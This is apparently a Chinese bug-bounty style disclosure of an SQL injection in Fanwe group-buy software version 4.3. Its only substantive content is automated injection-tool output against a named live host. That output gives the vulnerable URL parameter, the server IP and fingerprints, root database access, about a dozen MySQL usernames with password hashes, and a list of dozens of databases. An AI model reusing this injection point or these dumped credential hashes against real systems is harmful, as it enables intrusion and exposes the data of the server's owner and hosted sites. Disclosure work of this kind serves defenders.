方维团购4.3版本注射又一枚

### 简要描述： ..... ### 详细说明： ..... ### 漏洞证明： ``` http://t1.fanwe.net:93/t1/index.php?m=Goods&a=showcate&id=46 Target: http://t1.fanwe.net:93/t1/index.php?m=Goods&a=showcate&id=46 Host IP: 112.124.32.200 Web Server: IIS Powered-by: WAF/2.0 Powered-by: WAF/2.0 DB Server: MySQL >=5 Resp. Time(avg): 487 ms Compile OS: Win32 Sql Version: 5.1.63-community-log Current User: root@127.0.0.1 System User: root@127.0.0.1 Current DB: t1 Host Name: AY130625141005Z Installation dir: C:\Program Files\MySQL\MySQL Server 5.1 DB User & Pass: root:*F64A79FC5A78EB0E3F0B5D4FCA58030D524522C4:127.0.0.1 51ecshop:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 education:*CD4EAE64C0B40726E8C22412D4BAC402F8CDBD59:127.0.0.1 fanweadmin:*0347D00A9619E28D8BCD4C1D1642DC362BB24C3C:% fanwegame:*54468371D368D02A33062D435E2FCFAE4A6B3947:% eslicense:*B7EC60CFF920CFA3D9D423924E328D90BB9009AC:127.0.0.1 kiss:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% fx:*B4AE0DB043FD4B762BE654749D5F6BAC258B71DF:127.0.0.1 kaihao138:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% kisshack2010:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:% gametest:*54468371D368D02A33062D435E2FCFAE4A6B3947:% tianqi:*6011063EC01343A1BFF3D2BD675B1C2709F64696:127.0.0.1 root:*F64A79FC5A78EB0E3F0B5D4FCA58030D524522C4:% fanwetour:*0ADFF7036D3E13A456A7B731E1634838B7083AB1:% Data Bases: information_schema 51ecshop beach castle commlib daikuang daohang dingcan draw ecgbk ecshop273 education educationnew en escount fanwejx fanwetour fsgame game gametest huihoo localhost lyo2o m1 m15 m17 m18 m19 m2 m20 m21 m22 meishuihu meishuihulogin moyan mysql o2o o2o3 o2os rootkissdb share t1 test tianqi tw ultrax uu43share yhdz yhnew youhui zc14 zuilv ```